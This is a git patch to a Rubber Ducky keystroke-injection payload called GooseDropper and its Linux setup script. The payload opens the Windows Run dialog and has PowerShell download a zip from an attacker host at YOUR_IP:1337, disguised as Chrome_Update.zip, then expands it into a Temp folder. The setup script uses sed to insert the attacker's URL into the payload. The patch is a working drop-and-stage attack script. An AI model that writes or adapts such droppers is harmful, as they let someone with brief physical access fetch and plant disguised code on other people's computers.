From 0723ee2b2e8ea43a0cfad9ef45ccaa287ae2dd0f Mon Sep 17 00:00:00 2001 From: Fr3ki Date: Tue, 31 Oct 2023 15:29:10 -0600 Subject: [PATCH] Goose Dropper v2.0 bugfix --- Duckyscripts/GooseDropper/GooseDropper.txt | 4 ++-- Duckyscripts/GooseDropper/linux_setup.sh | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Duckyscripts/GooseDropper/GooseDropper.txt b/Duckyscripts/GooseDropper/GooseDropper.txt index 13392f9..e1c50d2 100644 --- a/Duckyscripts/GooseDropper/GooseDropper.txt +++ b/Duckyscripts/GooseDropper/GooseDropper.txt @@ -4,12 +4,12 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r DELAY 500 GUI r DELAY 500 -STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip +STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip ENTER DELAY 8000 GUI r DELAY 500 -STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update +STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update ENTER DELAY 3000 GUI r diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 5c9a65f..85f8e50 100644 --- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -23,7 +23,7 @@ then read -p "Enter your URL: " SRC #Add your URL to the payload - sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt + sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt #Remind users to have the zip ready echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"